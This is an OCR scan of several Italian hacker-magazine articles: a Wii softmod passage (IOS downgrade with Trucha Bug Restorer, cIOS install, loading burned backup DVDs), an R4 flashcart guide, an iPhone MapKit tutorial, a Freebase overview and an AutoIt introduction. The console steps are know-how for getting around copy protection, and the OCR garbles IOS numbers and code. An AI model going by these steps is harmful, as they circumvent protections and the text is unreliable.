Alla fine spegnete la console tenendo 
premuto il tasto Power e rimuovete 


la scheda SD. Il programma avrà creato 
due file: NAND.bin e KEYS.BIN sulla 
scheda. Questi file vanno conservati. 

E’ bene quindi copiarli sul PC in caso 

di malfunzionamenti della console e 
necessità, quindi, di ricaricali. Copiate 
‘anche la cartella bootmii. 

Ora si possono cancellare dalla scheda 
‘SD sia i file NAND.bin e KEYS.bin.che la 
cartella bootmii. 


SI RIPARTE 


Ora che avete il backup, potete avviare 
nuovamente la Wii con la scheda SD 
inserita. Ora, se avete una console con 
una versione firmware 3.4 4.0 4.1 e 

4.2 (per le versioni 3.3 o inferiori non è 
necessario) occorre approntare questo 
Ulteriore passaggio per ripristinare un bug 
nell'I0S36 riportandolo ad una versione 
precedente, in modo da poter installare 
attraverso di esso, il clOS che ci servirà 
al passo successivo per avviare copie di 
backup. 

Questo è un passaggio piuttosto delicato 
da seguire con attenzione (personalmente 


non ho: dovuto affrontario quindi ve lo 
riporto così come l'ho trovato su alcune 
guide on-line). Sì raccomanda di non 
proseguire se.non si-riesce ad effettuare 
questo! passaggio correttamente 
‘(tuttavia si può provare diverse volte ad 
esegurlo senza rischiare:nulla). 


= Avviare il canale HomeBrew Channel 
‘dal menu principale e tra la lista di 
programmi, scegliere di avviare Trucha 
Bug Restorer MOD. 


« Una volta avviato il programma, 
premere il pulsante B del WiiMote, 
quello nella parte inferiore, per No IOS 
Reload. Attenderequalche istante e solo 
dopo la comparsa della scritta premere 
il tasto 1 


- A questo punto occorre spostarsi su 
Downgrade 10815 e confermare con.il 
tasto A. Scegliere Download IOS from 
NUS usando SINISTRA e DESTRA sul 
WiiMote e premere nuovamente A. Verrà 
‘avviata la connessione ad internet per il 
downgrade dell’IO$15. 


- Premere A per lo step 1 e dopo 
premere ancora A per lo step.2. Finita 
l'installazione, verrete riportati su 
HomeBrew Channel 


Prendete fiato (un po' di affanno misto 
‘ad ansia è comprensibile), quindi 
procedete come segue: 


- Avviare Trucha Bug Restorer:MOD 
come già visto nel precedente 
passaggio. Selezionare Sinistra dal 
WiiMote fino a scegliere 10S15 alla voce 
Select which IOS to load poi premere A e 
dopo qualche secondo il tasto 1. 

- Scegliere il {0536 Menu e premere A. 
Modificare sempre con sinistra o destra 
perfare uscire TUTTE e 3 le voci su YES. 
Premere nuovamente A sulla Voce Install 
Patched I0S36 e selezionare Download 
1OS'from NUS con sinistra e destra. 


Dopo la:connessione ad internet e la: î 
preparazione dei file, premere A per 
iniziare l'installazione. 


RIPRISTINO 10515 


Rimane da ffrontare il ripristino di 
10S15: 


- Avviare nuovamenteTrucha Bug 
Restorer MOD, scegliere di caricare 
10S36, premere A, quindi il tasto 1 e 
dal menu selezionate Restore 10S15 e 
selezionare Download IOS from NUS. 


- Premete A una volta finita la 
preparazione per avviare l'installazione 
8 ripristinare la versione originale 
dell’10S15. 


CARICARE LE COPIE 


Dopo tutta questa faticata si 

può procedere verso la parte più 
interessante, ovvero il caricamento dei 
DVD di backup masterizzati. Anche in 
questo caso la procedura si dirama in 
due vie: 


CONSOLE CON FIRMWARE 4.2 

Se la console è aggiornata alla 
versione di firmware 4.2 occorre 
cancellare degli “stub” che altrimenti 
impediranno l'installazione di clOS. 


- Avviare HomeBrew Channel e 
scegliere AnyTitle Deleter DB (è 
presente solo nel pacchetto Wii4_2). 


- Scegliere inizialmente come IOS 

la versione 10S36 usando Sinistra 
sul WiiMote e premere A. Premere il 
tasto 2 del WiiMote per aggiornare il 
database. 

- Selezionare System Titles Ci) 


E peli! 


VE9 
sò 


‘dove è presente la lista completa degli 
10S di sistema installati sulla console. 


- Selezionare ad uno ad uno i Î 
seguenti file-(se presenti); 109222; 
108223, 10S249 e 108250; quindi 
premere il pulsante A e poi di nuovo 
‘A ‘per confermare la cancellazione, 
Attenzione a non cancellare altri 
10S: solo 108222, 10223, 10S249 e 
10S250! 


= Avviare l'HomeBrew Channel e 
selezionare cIOS38rev17. Scorrere il 
ment di HomeBrew-Channel a sinistra 
‘e‘destra usando il tasto “+” 0." 
‘oppure premendo sulle frecce. 


- Scegliere che venga eseguito tramite 
10536 e premere A. Scegliere network 
installation e confermate l'installazione 
premendo nuovamente A. Anche in 
questo caso la Wii si collegherà ad 
internet per scaricare i file necessari 
(ovvero l'IOS38). 


A questo: punto proseguire secondo le 
indicazioni del paragrafo “Console con 
firmware precedente a 4.2”, gli altri, 
con firmware precedenti, partiranno 
invece direttamente da qui 


FIRMWARE PRECEDENTE A 4.2 

- Prendere una vostra copia di un 
DVD e inserirla nella console. Avviare 
l'HomeBrew Channel. Il programma 
da utilizzare per caricare i‘backup è 
NeoGamma. 


= Scegliere Launch Game on DVD, 
ignorando le altre opzioni e se tutto è 
andato a buon fine, la Wii caricherà la 
copia di backup. 


Att.ne: per conservare questa modifica 

software e le altre proposte in rete, 

non bisogna più aggiornare la console 

con gli update ufficiali proposti da 
Nintendo. 


Ecco alcune schermate dei 
vari passaggi “catturate” dal 
televisore di casa. La procedura 
è andata a buon fine consentendo 

di caricare le copie dei giochi 
originali senza alcun problema. 
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n 1 i 


iI 


R4: ISTRUZIONI 
PER L'USO 


INSTALLARE 
FILE .NDS SUL 
NINTENDO DS 
O DS LITE? 
NULLA DI PIÙ 
SEMPLICE CON 
LA SCHEDA RA. 


olti lettori ci 
hanno chiesto 
delucidazioni 
sulla scheda R4 
Revolution per 
Nintendo DS Lite. Si tratta di 
un dispositivo in commercio 
che consente la lettura dei file. 
nds, quindi dà, in parole povere, 
la possibilità di caricare e fare 
girare giochi per Nintendo DS. 
Per il nostro test abbiamo 
acquistato in un negozio di 
Milano una scheda R4 SDHC, 
upgrade della Revolution, con 
micro sd da 2GB: costo 32 euro. 
La confezione contiene: 
La scheda R4 da inserire 
nell’alloggiamento del Nintendo 
DS riservato alle cartucce di 
gioco. 
Un adattatore USB in cui inserire 


| la micro DS per visualizzarla sul 


PC e caricarvi i contenuti. 
Una scheda micro Sd da 2 GB 
(ma il taglio può essere anche 
superiore). 


L’uso della R4 SDHC è piuttosto 
semplice. Basta caricare un 
gioco con estensione .nds sulla 
scheda micro SD, inserirla 
nell’alloggiamento della R4 e, 
infine, quest’ultima nel Nintendo 
DS e avviare. 

Prima di fare ciò bisogna però 
‘assicurarsi di caricare il kernel 
corretto, ovvero il sistema 
operativo in grado di installare 
l’interfaccia e fare girare tutti i 
componenti. 


Per fare ciò basta collegarsi 
solitamente al sito del 
produttore, nel nostro caso 
http://www.r4i-sdhc.com/ 
indexe.asp, scaricare il kernel 
appropriato (nella sezione 
download) alla scheda R4 tra 


i diversi disponibili, quindi 


scompattarlo e caricare tutti 
i file contenuti nella directory 
principale della scheda SD. 
Nel nostro caso abbiamo 
caricato i seguenti file: 


Moonmemo (cartella) 
Moonshi (cartella) 
R4iMenu (cartella) 
R4.dat 


Ora la R4 è pronta per ospitare i 
lochi Nintendo con estensione 
.nds. Avviando il Nintendo DS dopo 
‘averla inserita verrà visualizzata 
un'interfaccia grafica che mostra 
l’elenco di tutte le risorse .nds, 


| Basta selezionare un gioco ed 
avviare, la scheda genererà il file 

salvataggio relativo e si potrà 
iniziare giocare. 


PROBLEMI DIFFUSI 


Uno dei problemi più diffusi 
è il mancato caricamento 
dell’interfaccia o del gioco. Ovvero 
il sistema si blocca in un “loading” 
che non finisce mai. Si tratta 
in questo caso di un problema 

‘di kernel, probabilmente avete 


| scaricato e installato un kernel 


non adatto a quella scheda R4. 
Per risolvere il problema basta 
scaricare la versione corretta e 
tutto andrà a posto. 


Un altro problema decisamente 
più fastidioso è il sistema 
operativo che va in “crash” dopo 
alcuni giorni che non si utilizza 


la cartuccia R: 


l'utilizzo dei giochi. Si tratta di 

un problema noto che può essere 
risolto semplicemente spostando 
indietro di qualche giorno la -——_— 
data del proprio Nintendo DS. E' 
un’operazione un po’ empirica ma 
funziona. Evidentemente questo 
accorgimento è piuttosto sgradito 
a chi gioca con titoli come Animal 
Crossing che fanno progredire il 
gioco in base al calendario. 


“ui 


xDxD@gmail.com «siii 


envenuti! Svilupperemo una semplice 

‘applicazione /Jocation-based (LB) per iPhone. 

Le applicazioni LB sono di molti tipi, quasi 

sempre commerciali, ma non mancano I 

esempi di estremo interesse come il recente If 

Serendipitor (di Mark Shepard, http:// 
serendipitor.net) che permette di realizzare passeggiate 
surreali e situazioniste attraverso le città (“...svolta l'angolo. 
Se non c'è il sole, immaginalo per 5 minuti"). Oppure 
come Sukey (http://sukey.org/) l'applicazione utilizzata dai 
movimenti studenteschi in Inghilterra per sapere in tempo 
reale il posizionamento della polizia e le vie di fuga più 
sicure dalle situazioni più calde. O anche come Ubiquitous 
Anthropology (http://www.fakepress.it/FP/?p=37) in cui 
un sistema LB viene utilizzato in una ricerca antropologica 
assieme alla popolazione dei Bororo, in Brasile. In generale, 
il poter avere a disposizione in tempo reale le informazioni 
relative al luogo in cui ci troviamo è utile per motivi pratici e 
per ampliare le nostre possibilità di espressione. 


INIZIAMO 


Cominceremo a studiare come si crea una App 
partendo da un esempio molto semplice: creeremo 
un’applicazione di base che usa il GPS ed è in grado di 
visualizzare la nostra posizione su una mappa. 

Sarà utile specificare che per sviluppare applicazioni per 
iPhone occorre utilizzare i sistemi Apple: un Macintosh 
e un ambiente di sviluppo Xcode. Se volete distribuire 
le vostre applicazioni tramite lo store, dovrete anche 
pagare l'iscrizione al programma di sviluppo. 

Questa situazione comporta molti disagi per chi crea 
applicazioni e molti vantaggi alla Apple, che mantiene 


DOVE SONO? un controllo rigidissimo sul processo. Per ora evitiamo 
UNA SEM PLICE questo lungo discorso perché non avremmo spazio per 
O ei i l’articolo vero e proprio (magari lo faremo in un’altra 
APPLICAZIONE occasione). Intanto andate su http://developer.apple. 
LOCATION BASED com, registratevi, scaricate Xcode con il SDK (Software 
PER IPHONE Development Kit) più aggiornato per iPhone, installatelo 


(non dà complicazioni) e via! Si parte. 


Immagine 1: la schermata di benvenuto di Xcode, con le opzioni 
necessarie alla creazione di progetti di ogni tipo. Un solo IDE 
per ogni esigenza in ambiente Apple. 


—— _——_ 
COME E FATTA 
UN'APPLICAZIONE 


Per rendere semplici le cose, costruiremo questa 
applicazione passo per passo, come in un classico tutorial. 
Eseguito Xcode vi troverete davanti l’immagine 1. 
Selezioniamo l'opzione per creare un nuovo progetto, 
selezioniamo “Applicazioni” dalla sezione “OS” e, dalle 
opzioni sulla destra, selezioniamo la voce “Window-based 
application”. Nella sezione in basso selezioniamo “iPhone” 
dal menu a tendina e deselezioniamo l'opzione Code Data. 
Premiamo il pulsante “Choose..." per confermare la 
creazione. Scegliamo un luogo adatto sul nostro hard 

disk, un nome per l'applicazione (io ho scelto “Trovami”) e 
premiamo “Save”. Il primo passo è fatto! 

Il cuore di tutte le applicazioni iPhone è l’Application 
Delegate. Questo ha il compito principale di eseguire il setup 
iniziale dello schermo e di controllare quali viste (le View) 
vengono mostrate nei vari momenti dell’esecuzione, ognuna 
gestita dal suo ViewController. 

Nel nostro esempio l’Application Delegate si chiama 
TrovamiAppDelegate, e osservando i due file sorgente 

(il “.hn” che contiene le definizioni e il “.m” che contiene le 
implementazioni) vedremo che è effettivamente scarno: 
contiene solo un oggetto di tipo U/Window, la finestra 
principale della nostra Applicazione. 

Il kit di sviluppo offre molte librerie tematiche organizzate in 
Framework che possiamo aggiungere al nostro progetto. 
Clicchiamo sulla voce “Frameworks” sulla sinistra dello 
schermo, nella lista degli elementi che compongono il nostro 
progetto, richiamiamo il menu contestuale, selezioniamo 
“Add” e poi “Existing Framework”. Dalla lista che apparirà 
selezioniamo “MapKit.framework” e “CoreLocation. 
framework". Confermiamo con il pulsante in basso a destra. 
Se tutto è andato bene troveremo due voci aggiuntive 
nell'elenco dei Framework aggunti al nostro progetto. 


AGGIUNGIAMO IL CODICE 


L'Application Delegate controlla i ViewController per 
gestire l'interfaccia delle nostre applicazioni. La prima 
cosa da fare, quindi, è creare un ViewController.che 
gestisca realmente la nostra mappa: lo chiameremo 
MapViewController (ma il nome è arbitrario). 

Clicchiamo sulla cartella “Classes” nell'albero delle risorse 
del progetto, facciamo apparire il menu contestuale e 
scegliamo “Add” e poi “New File...” nei sottomenu. 

Vi troverete nella schermata che vedete nella immagine 
2. Selezionate sulla sinistra la voce “Cocoa Touch Class”, 
per creare classi adatte all'interfaccia touch dell'iPhone, 
e poi “U/ViewController subclass”, lasciando tutte le 
opzioni in basso deselezionate. Premete il pulsante “Next” 
e inserite il nome del file in alto: “MapViewController.m” 
(il file “.h” verrà creato automaticamente, assieme ad 

una serie di funzioni predefinite). Con questa semplice 
operazione abbiamo creato una “sotto classe” della 
classe U/ViewController, utilizzando il metodo della 
“estensione”, tipico della programmazione ad oggetti: 
data una classe di base è possibile crearne un’altra che 
ne possiede tutte le caratteristiche più quelle sviluppate 
su misura da noi (sovrapponendosi a quelle con lo stesso 
nome già esistenti nella classe di base). 

Ora possiamo aggiungere un po' di codice al nostro 
nuovo MapViewController per gestire la mappa. 

Nelle intestazioni (il file “MapViewController.h”) 
‘aggiungiamo il supporto per il framework MapKit, 
aggiungendo nella sezione degli import la seguente 
istruzione: 


#import <MapKit/Mapkit.h> 


Ora la nostra classe può utilizzare le funzionalità offerte 
dal framework per il mapping, e quindi possiamo 
‘aggiungere nella interface una proprietà di tipo 
MKMapView, la View (vista) che permette di ospitare 
nelle nostre applicazioni una Google Map interattiva. 
Aggiungiamo alla nostra interface la dichiarazione: 


MKMapView *map; 


In più ci interesserà poter utilizzare anche da altre classi le 
funzioni della nostra mappa, ad esempio per controllarne 
il livello di zoom o la posizione: la trasformeremo in una 
proprietà del nostro ViewController. 

Dopo la parentesi graffa della chiusura della nostra 
interface aggiungiamo la dichiarazione: 


@property (nonatomic,retain) MKMapView *map; 


Questa dichiarazione descrive in maggior dettaglio il 
funzionamento della nostra mappa e ci dice che verrà 
mantenuta in memoria per tutto il ciclo di vita della nostra 
applicazione: dovremo occuparci della sua rimozione dalla 
memoria quando non ne avremo più bisogno. 
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PROGRAMMINE/FACILE 


Occupiamoci ora dell’implementazione del nostro 
MapViewController, completando alcuni elementi del file 
“MapViewController.m”. Per prima cosa utilizzeremo, 
subito dopo la direttiva “@implementation” che dichiara 
l’inizio della nostra implementazione, il comando: 


per generare in maniera automatica i metodi “getter" e 
“setter” che saranno usati per leggere e impostare i valori 
delle varie caratteristiche della nostra proprietà. 

In fondo all’implementazione, nella funzione “dealloc” (la 
funzione standard che si occupa di ripulire la memoria al 
termine del ciclo di vita delle istanze delle varie classi), 
inseriremo il comando: 


per liberare la memoria relativa alla nostra mappa, non 
‘appena questa non ci servirà più. 

Per i meno esperti: notate come vengono invocate le 
funzioni nel dialetto C di Apple, l’Objective-C: le funzioni 
si chiamano “messaggi” e vengono invocate con questa 
sintassi che utilizza le parentesi quadre. Il precedente 
comando si può quindi leggere come “invia il messaggio 
release all'oggetto map”, che corrisponde all’invocazione 
di funzioni in altri dialetti del C ed in altri linguaggi. 

Nel corpo del messaggio, eliminiamo i commenti intorno 
al metodo /oadView (cancellando i caratteri “/*” e “*/” 
all’inizio e fine del metodo) e inseriamo al suo interno i 
comandi per caricare la view: 
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Il primo comando inizializza un oggetto mappa (alloc) 
e poi lo dimensiona su un riquadro di schermo (Frame) 
grande quanto lo schermo stesso (usando le funzioni 
offerte dalla classe UlScreen). 

Il secondo comando configura la mappa in modo da 
utilizzare in maniera automatica il Framework di Core 
Location per cercare la posizione dell'utente. 

Il terzo comando aggiunge la mappa vera e propria al 
nostro ViewController. 

Così creato lo scheletro del nostro ViewController, 
possiamo ora utilizzarlo nell’Application Delegate. 
Editiamo il file “TrovamiAppDelegate.h” per includere la 
mappa e il suo controller nell’applicazione. Tra gli import 
aggiungeremo, quindi: 


Nelle dichiarazioni aggiungeremo una istanza del nostro 
ViewController con il comando: 


E poi lo trasformeremo in proprietà nel modo già visto 
prima, con la dichiarazione: 


Modifichiamo ora il file “.m” dell'Application Delegate 
dove aggiungeremo: 


per creare i “getter” e “setter” per il nostro ViewController, 
e, nel metodo “dealloc”, aggiungeremo il comando: 


per liberare la memoria alla fine dell'esecuzione. 

Non ci resta che aggiungere il nostro ViewController 
all'interfaccia. Possiamo farlo nel metodo 
didFinishLaunchingWithOptions già presente nel file “.m”, 
aggiungendo i comandi: 


‘ovvero inizializzando l'oggetto MapViewController e 
‘aggiungendone la view alla finestra (window). 

Il codice di questo primo semplice esempio è completo. 
Selezioniamo dal menu a tendina in alto a sinistra su 
Xcode le opzioni “Simulator” e “Debug”, compiliamo ed 
eseguiamo il tutto cliecando sul pulsante “Buid/Run” in 
cima all'interfaccia dell’editor. Vedremo apparire sullo 
schermo dell'iPhone simulato la mappa con evidenziata la 
posizione attuale (il simulatore restituisce una posizione 
sempre uguale, ma quando lo eseguirete sull'iPhone 
verranno utilizzati il GPS e la bussola). 

Il risultato è quello dell'immagine 3. 


IL CODICE COMPLETO 


Di seguito trovate il codice completo di questo piccolo 
esempio. Inseriamo qui solo le componenti rilevanti: Xcode 
‘avrà aggiunto in maniera automatica anche altre funzioni 
alla vostra classe che devono essere utilizzate in varie 
situazioni del ciclo di vita delle applicazioni. Il codice qui 
incluso permette però di focalizzare l'attenzione sulle sole 
componenti che abbiamo sviluppato insieme. 


- MapViewController.h 


#import <UIKit/UIKit.h> 

#import <MapKit/MapKit.h> 

@interface MapViewController : 
MKMapView *map; 

} 


@property (nonatomic,retaîn) MKMapView *map; 
@end 


UIViewController { 


- MapViewController.m 


#import “MapViewController.h” 
@implementation MapViewController 
@synthesize map; 
- (void)loadView { 

map = [[MKMapView alloc] 
initWithFrame:[[UIScreen mainScreen] 


ll ‘applicationFrame]]; 


map.showsUserLocation = YES; 
self.view = map; 


} 
- (void)dealloc { 
[map release]; 
[super dealloc]; 


} 
@end 


- TrovamiAppDelegate.h 


#import <UIKit/UIKit.h> 
fimport “MapViewController.h” 
@interface TrovamiAppDelegate : 
<UIApplicationDelegate> { 
UIWindow *window; 
MapViewController *mapController; 


NSObject 


i; 


| @praperty (nonatomic, retain) IBOutlet UIWindow 


*window; 

@property (nonatomic, retain) MapViewController 
*mapController; 

@end 


- TrovamiAppDelegate.m 
#import “TrovamiAppDelegate.h” 


@implementation TrovamiAppDelegate 
@synthesize window; 


@synthesize mapController; 
= (B00L)application:(UIApplication *)application 
didFinishLaunchingWithOptions:(NSDictionany *) 
launchOptions { 

mapController = [[MapViewController alloc] 
init]; 

[window addSubview:mapControllet.view]; 

[self.window makeKeyAndVisible]; 

return YES; 


si 

- (void)dealloc { 
[mapController release]; 
[Window release]; 
[super dealloc]; 


} 
@end 


PROSSIMI PASSI E 
CONCLUSIONI 


Questa applicazione non è ancora molto utile, ma ci 
consente di avere una base di partenza per costruire cose 
più complesse, e di capire i meccanismi di base utilizzabili 
per le nostre applicazioni location based. 

Fateci sapere se l'argomento è di vostro interesse! 
Potremmo proseguire ed esplorare l'aggiunta di 
informazioni alle mappe, come collegarle con i social 
network e addirittura creare uno tutto nostro. 

Fatevi sentire! 


11:03 AM 


Canada 


IL'INOH 
mo SI 


AR 


Immagine 3: il simulatore disponibile nell’SDK non riporta la 
poisizione corretta rilevata dal GPS. Una volta installata in un 
dispositivo reale, però, tutto funzionerà a dovere. 


‘amie Taylor è un 

personaggio che attira 

simpatia, a partire dal suo 

aspetto che ricorda il tipico 

hippie californiano fino 

alla sua carica, “Minister 
of Information” di Freebase. Quando 
nell'estate 2008 presenta il sistema 
sviluppato da Metaweb al pubblico 
(www.freebase.com), piuttosto ridotto 
ma altrettanto interessato, riunitosi al 
Cubberley Community Center di Palo 
Alto, pochi riescono a prevedere il 
successo che avrà di lì a poco, ma di 
sicuro molti restano entusiasti della 
sua presentazione. Oggi, a quasi tre 
anni di distanza, Metaweb è stata 
acquisita da Google, Freebase è 
migliorato ulteriormente e la filosofia 
hacker su cui il progetto è nato e 
cresciuto sembra non essere mai 
stata persa di vista. 


La disambiguazione effettuata da 
Freebase sulla stringa “Harry Potter”. 
Gli automatismi sono vantaggiosi! 


di +m 
redazione@hackerjournal.it 


——— — —+—————__€— 
COS'E FREEBASE? 


Freebase è un enorme database 
collaborativo, contenente dati 
strutturati relativi a circa 20 milioni di 
entità (persone, posti, o cose). | “dati 
strutturati” sono dati ben formattati 

e dotati di un tipo ben definito (come 
ad esempio campi di un database, 
elementi di un documento XML, o 
celle di un foglio di calcolo), in modo 
da essere facilmente manipolabili 

da diversi tipi di software. Nel caso 

di Freebase i dati non solo sono 
strutturati, ma sono anche rilasciati 
con licenza Creative Commons 
Attribution (CC-BY): questo significa 
che chiunque desideri accedere ai dati 
di Freebase non solo ha i mezzi tecnici 
per farlo, ma è anche legalmente 
autorizzato a utilizzarli come meglio 
crede all’interno delle proprie 
‘applicazioni (legalmente!). 

Il modo più semplice per spiegare 
cosa si può trovare in Freebase è 
collegarsi ad una delle sue pagine, ad 
esempio http://www.freebase.com/ 
view/en/amold_schwarzenegger. 
Poichè Arnold Schwarzenegger è un 
attore, all’interno di questa pagina 
‘compare l’elenco completo dei 

suoi film. Poichè è anche anche un 
politico, la pagina mostra il suo attuale 
incarico di governatore della California 
e l'elenco dei suoi predecessori. 

Non solo: possiamo trovare anche 


ALLA SCOPERTA 
DI FREEBASE 
IL DATABASE 

COLLABORATIVO. 


informazioni relative ad Arnold in 
quanto “persona” (religione, parenti, 
data e luogo di nascita), “atleta” (sport 
praticati) e “autore di libri” (elenco 

di libri pubblicati). Infine, la maggior 
parte delle informazioni presenti nella 
pagina contengono collegamenti 

ad altre pagine (chiamate topic nel 
gergo di Metaweb) che a loro volta 
presentano informazioni a volte molto 
dettagliate sulle relative entità. 
Attraverso questo esempio è possibile 
capire quali sono i principali punti di 
forza di Freebase. Prima di tutto, i dati 
che compaiono all'interno di questo 
sistema provengono dalle fonti più 
disparate (http://wiki.freebase.com/ REINA] 
wiki/Data_sources): giusto per citarne i : 
alcune, Wikipedia (dalle cui infobox 

è possibile estrarre dati strutturati), 

IMDB, MusicBrainz e Netflix. Inoltre, 

le informazioni sono tutte collegate fra 

di loro come all’interno di un enorme 

grafo, e da ogni nodo di questa rete 


La infobox introduttiva nella pagina di 
Arnold Schwarzenegger: dati strutturati 
e riutilizzabili facilmente. 


è possibile raggiungere diversi 

altri ottenendo informazioni sempre 
pertinenti e correlate. Infine, per poter 
rendere tutto questo possibile ogni 
entità è associata a un identificativo 
ben definito, grazie al quale è possibile 
riferirsi ad essa senza incorrere in 
‘ambiguità. In pratica non importa da 
quante differenti fonti di dati siano 
state recuperate le informazioni 
relative ad Arnold Schwarzenegger, 

il lavoro di Freebase è proprio quello 
di unificarle tutte e far sì che si 
riferiscano allo stesso topic. 


COME FUNZIONA 


Utilizzare Freebase è semplicissimo: 
è sufficiente collegarsi al sito www. 
freebase.com e inserire del testo 
nella casella di ricerca. Prima ancora 
che venga premuto invio, il motore 
avrà già suggerito diverse scelte per 
rendere più precisa la ricerca. Ad 
esempio, se inseriamo “Harry Potter” 
verrà suggerito ogni suo singolo libro 
e film, oltre al topic relativo ad Harry 
Potter come “fictional character". 
Tutto questo senza neanche bisogno 
di registrarsi all’interno del sistema: 
con una login e una password, invece, 
avremo la possibilità non solo di 
leggere i contenuti di ogni topic, ma 
anche di aggiornarli o di aggiungerne 
di nuovi. Pur essendo la modalità di 
accesso più semplice alle informazioni 
di Freebase, l'interfaccia web non è 
tuttavia quella più potente. Questo 
sistema, infatti, dà il meglio di sé 
quando viene interrogato in modo 
automatico tramite il suo linguaggio 
di query chiamato MQL (Metaweb 
Query Language). Questo linguaggio 


consente infatti di superare i limiti 
imposti dalla singola pagina Web e 
sfrutta la struttura a grafo dei dati per 
fomire in modo rapido informazioni 
‘aggregate. Nel box è mostrato un 
esempio molto semplice di query, 
ma tramite il query editor disponibile 
online (http://www.freebase.com/ 
queryeditor) possiamo trovarne molti 
alttri. | query editor è uno strumento 
molto potente e semplice da usare: 
al suo interno, infatti, compaiono 

sia esempi che possono essere 
facilmente usati come punto di 
partenza per query più complesse, 
sia tutorial e guide per MOL. 

Inoltre, in ogni momento è possibile 
trasformare la propria query in un link 
che restituisce i risultati della query 
in formato JSON, pronti da utilizzare 
all'interno della propria applicazione. 


PROGRAMMARE 
CON FREEBASE 


Se, convinti dalla potenza di MQL, 
decidiamo di sviluppare applicazioni 
“Freebase-powered", non c'è da 
preoccuparsi: Metaweb ha sviluppato 
un servizio apposito, chiamato 
maqlread e disponibile all'indirizzo 
www.freebase.com/api/service/mqlread, 
al quale è sufficiente mandare la 
query sotto forma di HTTP GET per 
ottenere il risultato in JSON. Inoltre, 
sono state sviluppate diverse librerie 
che permettono di accedere in 

modo semplice a Freebase usando 
praticamente qualsiasi linguaggio di 
programmazione (fra quelli supportati, 
compaiono ad esempio Java, 
Javascript, Flash, Python, Perl e PHP). 
Infine, per chi ama sperimentare 


tecnologie particolarmente innovative 
c'e’ ACRE (http://wiki.freebase.com/ 
wiki/Acre): si tratta di un ambiente di 
sviluppo opensource, sviluppato da 
Metaweb e accessibile online, che 
consente di scrivere applicazioni Web 
basate su Freebase in modo semplice 
e collaborativo. Ogni utente, infatti, 
può scegliere di rendere pubbliche 

le proprie applicazioni e allo stesso 
tempo accedere al codice sorgente di 
quelle condivise da altri. 
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licca qua e clicca tà: la 
vita di un informatico 
sembra fatta di miliardi 
di clic, inesorabilmente 
uno dietro l’altro. 
Quando, poi, hai a 
che fare con interfacce utente fatte 
da qualche genio che ti obbligano a 
migliaia di clic ripetitivi, le riflessioni 
sono solo desolanti. Fino a quando 
uno non si stanca di ripetere sempre 
le stesse azioni e non inizia a 
pensare che un computer potrebbe 
benissimo farsele da solo. Anche 
se l'interfaccia è stata pensata da 
qualcuno che meriterebbe il peggio 
della vita. Ad aiutare l’informatico 
esasperato dai clic ripetitivi c'è Autolt 
(www.autoitscript.com): un sistema 
di scripting per la GUI di Windows 
che assomiglia moltissimo a un 
linguaggio di programmazione vero e 
proprio. Le sue caratteristiche, infatti, 
vanno ben oltre lo scripting: con una 
sintassi molto simile a quella di Visual 
Basic, scelta per renderne più facile 
l'apprendimento dai programmatori, 
Autolt permette di costruire script 


AUTOIT È UN 
LINGUAGGIO DI 
SCRIPTING PER 
AUTOMATIZZARE 
LA GUI E PUO 
ESSERE USATO 

ANCHE COME 

LINGUAGGIO 

COMUNE. 


‘ad hoc per qualsiasi operazione 
riguardante Windows, simulando 
pressioni di tasti, movimenti del 
mouse e manipolando a piacere 

le finestre dei programmi. Tutte 
operazioni impossibili o difficilmente 
realizzabili con altri linguaggi. 

Se vogliamo, possiamo persino 
trasformare gli script in EXE e questo 
si traduce nella possibilità, per 
esempio, di creare utility per l'input 
automatico di dati in form on line (si fa 
per dire, naturalmente ;) ) che possono 
essere ridistribuite a piacere, magari 
tramite un file .torrent su misura. 

Dal punto di vista funzionale, il 
linguaggio supporta le espressioni 
complesse, le funzioni definite 
dall'utente, i cicli, le strutture 
decisionali e molto altro. Non solo: 
Autolt permette di creare delle GUI 

di comando da cui attivare parti 

dei suoi stessi script, ci permette 

si usare espressioni regolari, può 
chiamare DLL esterne, non richiede 
installazione, è compatibile con 
qualsiasi versione di Windows e 
supporta Unicode. Non credo si possa 


chiedere di più a un linguaggio di 
scripting per la GUI. 


UN ESEMPIO 


Pensiamo, per esempio, a qualcosa 

che apra il Notepad, ci scriva dentro 

un testo e salvi il documento ottenuto. 
Apriamo l’editor fornito con Autolt 

{che non è nient'altro che una versione . ;; 
personalizzata di SciTe Lite) e iniziamo 

a scrivere: 


Run(“notepad.exe") 
Poi dobbiamo fare in modo che 

lo script attenda il caricamento di | 
Notepad. Aggiungiamo una riga: SMIjINI 


WinWaitActive(*[CLASS:Notepad]") 


A questo punto possiamo iniziare a 
scrivere testo nella finestra, usando il 
comando Send: 


Send("Questa è una prova {ENTER}! 2 
345678910{ENTER}") 


Ora chiudiamo la finestra con ALT+f e 3 


Disegnare un orologio analogico è 
complicato ma è un esempio che 
insegna moltissimo su Autolt. 


tes“ —/[1—“— Idi: 


selezionando e (esci): 


A questo punto, il Notepad ci 
chiederà conferma del salvataggio 
del documento. Dovremo attendere 
la comparsa della finestra e negare il 
salvataggio (o confermarlo): 


WinWaitActi 3locco 


ant 


Ora aspettiamo che il programma si 
chiuda, dando il comando 
WinWaitClose("[CLASS:Notepad]") 
Nel nostro editor avremo ora uno 
script da 8 linee, sufficienti per 
eseguire le nostre operazioni con 
Notepad. Salviamo lo script e apriamo 
il programma Run Script di Autolt. 
Selezioniamo lo script appena creato 
e guardiamolo in azione: sembra una 
magia ma è la realtà. 

Gli esempi installati con il programma 
sono molti ma facciamo attenzione: 

in Windows i nomi delle finestre sono 
localizzati e gli esempi sono studiati 
per funzionare sulla versione in lingua 
inglese; basta poco, però, per adattarli 
anche a un Windows italiano. 

Tra tutti gli esempi, alcuni sono 
particolarmente indicativi della 
potenza del programma. Clock. 

au3, per esempio, più che uno script 
sembra essere un programma vero e 
proprio. Non agisce sulla GUI ma crea 
oggetti e layer per rappresentare un 
‘orologio in trasparenza sullo schermo. 
Per farlo utilizza import di librerie già 
pronte tramite la direttiva import, 
dichiarazioni di variabili e costanti 
globali, una serie di funzioni scritte ad 
hoc e numerosi richiami alle API e a 
funzioni matematiche standard. 


FINESTRE 


Le capacità di manipolazione di Autolt, 
però, non si esauriscono agendo sulla 
GUI. Già nell'esempio precedente, 
l'istruzione WinWaitClose fa 
riferimento non al nome di una finestra 
ma a un oggetto “Notepad”. Com'è 
facilmente intuibile, la manipolazione 


di oggetti di questo genere ci 
permette di usare Autolt anche per 
automatizzare operazioni particolari, 
che non vedono diretti cambiamenti 
nella situazione delle finestre. Non 
solo: la sua community di supporto 
sta sfruttando a fondo ogni possibilità 
offerta dal linguaggio, realizzando veri 
e propri programmi che estendono 

le capacità di programmi già 

